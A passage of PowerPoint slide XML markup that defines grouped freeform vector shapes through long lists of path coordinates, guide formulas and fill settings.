                      <a:lnTo>
                        <a:pt x="468" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="487" y="65"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="498" y="74"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="90"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="527" y="112"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="539" y="116"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="555" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="553" y="138"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="543" y="144"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="527" y="146"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="513" y="138"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="130"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="463" y="130"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="129"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="428" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="359" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="185"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="284" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="249" y="185"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="182"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="178" y="176"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="134" y="169"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="82" y="156"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="30" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="122"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="90"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="68" y="49"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="72" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="129" y="53"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="180" y="74"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="93"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="273" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="296" y="72"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="323" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="347" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368" y="7"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="398" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="409" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="421" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="438" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="455" y="32"/>
                      </a:lnTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:ln w="9525" cap="rnd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  <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="33" name="Group 57"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2379" y="3193"/>
                  <a:ext cx="515" cy="844"/>
                  <a:chOff x="503" y="1011"/>
                  <a:chExt cx="703" cy="1147"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="35" name="Freeform 58"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="503" y="1011"/>
                    <a:ext cx="697" cy="1136"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 515 w 697"/>
                      <a:gd name="T1" fmla="*/ 291 h 1136"/>
                      <a:gd name="T2" fmla="*/ 526 w 697"/>
                      <a:gd name="T3" fmla="*/ 402 h 1136"/>
                      <a:gd name="T4" fmla="*/ 532 w 697"/>
                      <a:gd name="T5" fmla="*/ 544 h 1136"/>
                      <a:gd name="T6" fmla="*/ 526 w 697"/>
                      <a:gd name="T7" fmla="*/ 671 h 1136"/>
                      <a:gd name="T8" fmla="*/ 529 w 697"/>
                      <a:gd name="T9" fmla="*/ 767 h 1136"/>
                      <a:gd name="T10" fmla="*/ 535 w 697"/>
                      <a:gd name="T11" fmla="*/ 814 h 1136"/>
                      <a:gd name="T12" fmla="*/ 546 w 697"/>
                      <a:gd name="T13" fmla="*/ 835 h 1136"/>
                      <a:gd name="T14" fmla="*/ 563 w 697"/>
                      <a:gd name="T15" fmla="*/ 850 h 1136"/>
                      <a:gd name="T16" fmla="*/ 580 w 697"/>
                      <a:gd name="T17" fmla="*/ 861 h 1136"/>
                      <a:gd name="T18" fmla="*/ 600 w 697"/>
                      <a:gd name="T19" fmla="*/ 861 h 1136"/>
                      <a:gd name="T20" fmla="*/ 637 w 697"/>
                      <a:gd name="T21" fmla="*/ 887 h 1136"/>
                      <a:gd name="T22" fmla="*/ 684 w 697"/>
                      <a:gd name="T23" fmla="*/ 919 h 1136"/>
                      <a:gd name="T24" fmla="*/ 691 w 697"/>
                      <a:gd name="T25" fmla="*/ 974 h 1136"/>
                      <a:gd name="T26" fmla="*/ 676 w 697"/>
                      <a:gd name="T27" fmla="*/ 1018 h 1136"/>
                      <a:gd name="T28" fmla="*/ 659 w 697"/>
                      <a:gd name="T29" fmla="*/ 1048 h 1136"/>
                      <a:gd name="T30" fmla="*/ 642 w 697"/>
                      <a:gd name="T31" fmla="*/ 1073 h 1136"/>
                      <a:gd name="T32" fmla="*/ 614 w 697"/>
                      <a:gd name="T33" fmla="*/ 1102 h 1136"/>
                      <a:gd name="T34" fmla="*/ 580 w 697"/>
                      <a:gd name="T35" fmla="*/ 1128 h 1136"/>
                      <a:gd name="T36" fmla="*/ 566 w 697"/>
                      <a:gd name="T37" fmla="*/ 1135 h 1136"/>
                      <a:gd name="T38" fmla="*/ 526 w 697"/>
                      <a:gd name="T39" fmla="*/ 1124 h 1136"/>
                      <a:gd name="T40" fmla="*/ 478 w 697"/>
                      <a:gd name="T41" fmla="*/ 1110 h 1136"/>
                      <a:gd name="T42" fmla="*/ 433 w 697"/>
                      <a:gd name="T43" fmla="*/ 1095 h 1136"/>
                      <a:gd name="T44" fmla="*/ 385 w 697"/>
                      <a:gd name="T45" fmla="*/ 1080 h 1136"/>
                      <a:gd name="T46" fmla="*/ 334 w 697"/>
                      <a:gd name="T47" fmla="*/ 1070 h 1136"/>
                      <a:gd name="T48" fmla="*/ 277 w 697"/>
                      <a:gd name="T49" fmla="*/ 1062 h 1136"/>
                      <a:gd name="T50" fmla="*/ 223 w 697"/>
                      <a:gd name="T51" fmla="*/ 1051 h 1136"/>
                      <a:gd name="T52" fmla="*/ 167 w 697"/>
                      <a:gd name="T53" fmla="*/ 1040 h 1136"/>
                      <a:gd name="T54" fmla="*/ 130 w 697"/>
                      <a:gd name="T55" fmla="*/ 1004 h 1136"/>
                      <a:gd name="T56" fmla="*/ 96 w 697"/>
                      <a:gd name="T57" fmla="*/ 956 h 1136"/>
                      <a:gd name="T58" fmla="*/ 71 w 697"/>
                      <a:gd name="T59" fmla="*/ 901 h 1136"/>
                      <a:gd name="T60" fmla="*/ 48 w 697"/>
                      <a:gd name="T61" fmla="*/ 844 h 1136"/>
                      <a:gd name="T62" fmla="*/ 29 w 697"/>
                      <a:gd name="T63" fmla="*/ 777 h 1136"/>
                      <a:gd name="T64" fmla="*/ 17 w 697"/>
                      <a:gd name="T65" fmla="*/ 712 h 1136"/>
                      <a:gd name="T66" fmla="*/ 3 w 697"/>
                      <a:gd name="T67" fmla="*/ 606 h 1136"/>
                      <a:gd name="T68" fmla="*/ 12 w 697"/>
                      <a:gd name="T69" fmla="*/ 536 h 1136"/>
                      <a:gd name="T70" fmla="*/ 26 w 697"/>
                      <a:gd name="T71" fmla="*/ 479 h 1136"/>
                      <a:gd name="T72" fmla="*/ 39 w 697"/>
                      <a:gd name="T73" fmla="*/ 427 h 1136"/>
                      <a:gd name="T74" fmla="*/ 56 w 697"/>
                      <a:gd name="T75" fmla="*/ 380 h 1136"/>
                      <a:gd name="T76" fmla="*/ 116 w 697"/>
                      <a:gd name="T77" fmla="*/ 296 h 1136"/>
                      <a:gd name="T78" fmla="*/ 184 w 697"/>
                      <a:gd name="T79" fmla="*/ 201 h 1136"/>
                      <a:gd name="T80" fmla="*/ 230 w 697"/>
                      <a:gd name="T81" fmla="*/ 135 h 1136"/>
                      <a:gd name="T82" fmla="*/ 269 w 697"/>
                      <a:gd name="T83" fmla="*/ 84 h 1136"/>
                      <a:gd name="T84" fmla="*/ 314 w 697"/>
                      <a:gd name="T85" fmla="*/ 44 h 1136"/>
                      <a:gd name="T86" fmla="*/ 359 w 697"/>
                      <a:gd name="T87" fmla="*/ 7 h 1136"/>
                      <a:gd name="T88" fmla="*/ 390 w 697"/>
                      <a:gd name="T89" fmla="*/ 29 h 1136"/>
                      <a:gd name="T90" fmla="*/ 422 w 697"/>
                      <a:gd name="T91" fmla="*/ 69 h 1136"/>
                      <a:gd name="T92" fmla="*/ 453 w 697"/>
                      <a:gd name="T93" fmla="*/ 121 h 1136"/>
                      <a:gd name="T94" fmla="*/ 484 w 697"/>
                      <a:gd name="T95" fmla="*/ 179 h 1136"/>
                      <a:gd name="T96" fmla="*/ 498 w 697"/>
                      <a:gd name="T97" fmla="*/ 211 h 11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697"/>
                      <a:gd name="T148" fmla="*/ 0 h 1136"/>
                      <a:gd name="T149" fmla="*/ 697 w 697"/>
                      <a:gd name="T150" fmla="*/ 1136 h 1136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697" h="1136">
                        <a:moveTo>
                          <a:pt x="501" y="216"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="504" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="509" y="266"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="515" y="291"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="518" y="318"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="521" y="347"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="524" y="376"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="526" y="402"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="529" y="430"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="529" y="467"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="532" y="507"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="532" y="544"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="532" y="581"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="529" y="609"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="526" y="643"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="526" y="671"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="524" y="705"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="526" y="726"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="526" y="745"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="529" y="767"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="529" y="785"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="532" y="795"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="532" y="807"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="535" y="814"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="538" y="822"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="541" y="829"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="543" y="829"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="546" y="835"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="549" y="839"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="555" y="844"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="558" y="847"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="563" y="850"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="566" y="850"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="572" y="857"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="574" y="857"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="580" y="861"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="583" y="865"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="589" y="865"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="594" y="861"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="600" y="861"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="606" y="857"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="616" y="869"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="625" y="876"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="637" y="887"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="650" y="894"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="662" y="905"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="674" y="912"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="684" y="919"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="696" y="931"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="693" y="946"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="693" y="959"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="691" y="974"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="688" y="993"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="684" y="1000"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="682" y="1008"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="676" y="1018"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="674" y="1029"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="667" y="1033"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="665" y="1040"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="659" y="1048"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="654" y="1051"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="650" y="1058"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="645" y="1066"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="642" y="1073"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="637" y="1080"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="628" y="1088"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="620" y="1091"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="614" y="1102"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="606" y="1110"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="597" y="1117"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="589" y="1124"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="580" y="1128"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="574" y="1135"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="572" y="1135"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="569" y="1135"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="566" y="1135"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="563" y="1135"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="549" y="1132"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="538" y="1128"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="526" y="1124"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="515" y="1120"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="504" y="1117"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="490" y="1113"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="478" y="1110"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="467" y="1106"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="456" y="1102"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="444" y="1098"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="433" y="1095"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="422" y="1091"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="407" y="1088"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="396" y="1083"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="385" y="1080"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="373" y="1076"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="362" y="1073"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="345" y="1070"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="334" y="1070"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="317" y="1066"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="306" y="1066"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="291" y="1062"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="277" y="1062"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="264" y="1058"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="252" y="1055"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="238" y="1051"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="223" y="1051"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="209" y="1048"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="196" y="1048"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="184" y="1043"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="167" y="1040"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="155" y="1040"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="147" y="1029"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="138" y="1014"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="130" y="1004"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="122" y="993"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="113" y="981"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="105" y="971"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="96" y="956"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="90" y="949"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="82" y="934"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="77" y="916"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="71" y="901"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="65" y="887"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="60" y="872"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="54" y="857"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="48" y="844"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="43" y="829"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="37" y="814"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="34" y="795"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="29" y="777"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="26" y="763"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="22" y="745"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="20" y="726"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="17" y="712"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12" y="693"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="9" y="668"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="5" y="639"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3" y="606"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="581"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3" y="562"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="9" y="551"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12" y="536"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="14" y="522"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="17" y="507"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="22" y="492"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="26" y="479"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="29" y="464"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="31" y="452"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="37" y="442"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="39" y="427"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="46" y="417"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="51" y="405"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="54" y="390"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="56" y="380"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="63" y="368"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="80" y="343"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="99" y="321"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="116" y="296"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="133" y="274"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="150" y="248"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="167" y="226"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="184" y="201"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="201" y="179"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="213" y="164"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="221" y="149"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="230" y="135"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="124"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="252" y="109"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="260" y="95"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="269" y="84"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="281" y="69"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="291" y="62"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="300" y="52"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="314" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="325" y="37"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="337" y="25"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="348" y="18"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="359" y="7"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="371" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="376" y="7"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="385" y="18"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="390" y="29"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="399" y="40"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="405" y="52"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="413" y="59"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="422" y="69"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="427" y="80"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="436" y="95"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="444" y="106"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="453" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="461" y="135"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="467" y="149"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="475" y="164"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="484" y="179"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="492" y="194"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="495" y="201"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="498" y="208"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="498" y="211"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="501" y="216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  <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="36" name="Freeform 59"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="503" y="1011"/>
                    <a:ext cx="703" cy="1147"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 519 w 703"/>
                      <a:gd name="T1" fmla="*/ 294 h 1147"/>
                      <a:gd name="T2" fmla="*/ 531 w 703"/>
                      <a:gd name="T3" fmla="*/ 406 h 1147"/>
                      <a:gd name="T4" fmla="*/ 536 w 703"/>
                      <a:gd name="T5" fmla="*/ 549 h 1147"/>
                      <a:gd name="T6" fmla="*/ 531 w 703"/>
                      <a:gd name="T7" fmla="*/ 678 h 1147"/>
                      <a:gd name="T8" fmla="*/ 533 w 703"/>
                      <a:gd name="T9" fmla="*/ 774 h 1147"/>
                      <a:gd name="T10" fmla="*/ 540 w 703"/>
                      <a:gd name="T11" fmla="*/ 822 h 1147"/>
                      <a:gd name="T12" fmla="*/ 551 w 703"/>
                      <a:gd name="T13" fmla="*/ 844 h 1147"/>
                      <a:gd name="T14" fmla="*/ 568 w 703"/>
                      <a:gd name="T15" fmla="*/ 859 h 1147"/>
                      <a:gd name="T16" fmla="*/ 585 w 703"/>
                      <a:gd name="T17" fmla="*/ 869 h 1147"/>
                      <a:gd name="T18" fmla="*/ 605 w 703"/>
                      <a:gd name="T19" fmla="*/ 869 h 1147"/>
                      <a:gd name="T20" fmla="*/ 643 w 703"/>
                      <a:gd name="T21" fmla="*/ 896 h 1147"/>
                      <a:gd name="T22" fmla="*/ 690 w 703"/>
                      <a:gd name="T23" fmla="*/ 928 h 1147"/>
                      <a:gd name="T24" fmla="*/ 697 w 703"/>
                      <a:gd name="T25" fmla="*/ 984 h 1147"/>
                      <a:gd name="T26" fmla="*/ 682 w 703"/>
                      <a:gd name="T27" fmla="*/ 1028 h 1147"/>
                      <a:gd name="T28" fmla="*/ 665 w 703"/>
                      <a:gd name="T29" fmla="*/ 1058 h 1147"/>
                      <a:gd name="T30" fmla="*/ 648 w 703"/>
                      <a:gd name="T31" fmla="*/ 1083 h 1147"/>
                      <a:gd name="T32" fmla="*/ 619 w 703"/>
                      <a:gd name="T33" fmla="*/ 1112 h 1147"/>
                      <a:gd name="T34" fmla="*/ 585 w 703"/>
                      <a:gd name="T35" fmla="*/ 1139 h 1147"/>
                      <a:gd name="T36" fmla="*/ 570 w 703"/>
                      <a:gd name="T37" fmla="*/ 1146 h 1147"/>
                      <a:gd name="T38" fmla="*/ 531 w 703"/>
                      <a:gd name="T39" fmla="*/ 1134 h 1147"/>
                      <a:gd name="T40" fmla="*/ 482 w 703"/>
                      <a:gd name="T41" fmla="*/ 1121 h 1147"/>
                      <a:gd name="T42" fmla="*/ 437 w 703"/>
                      <a:gd name="T43" fmla="*/ 1105 h 1147"/>
                      <a:gd name="T44" fmla="*/ 388 w 703"/>
                      <a:gd name="T45" fmla="*/ 1090 h 1147"/>
                      <a:gd name="T46" fmla="*/ 337 w 703"/>
                      <a:gd name="T47" fmla="*/ 1080 h 1147"/>
                      <a:gd name="T48" fmla="*/ 279 w 703"/>
                      <a:gd name="T49" fmla="*/ 1072 h 1147"/>
                      <a:gd name="T50" fmla="*/ 225 w 703"/>
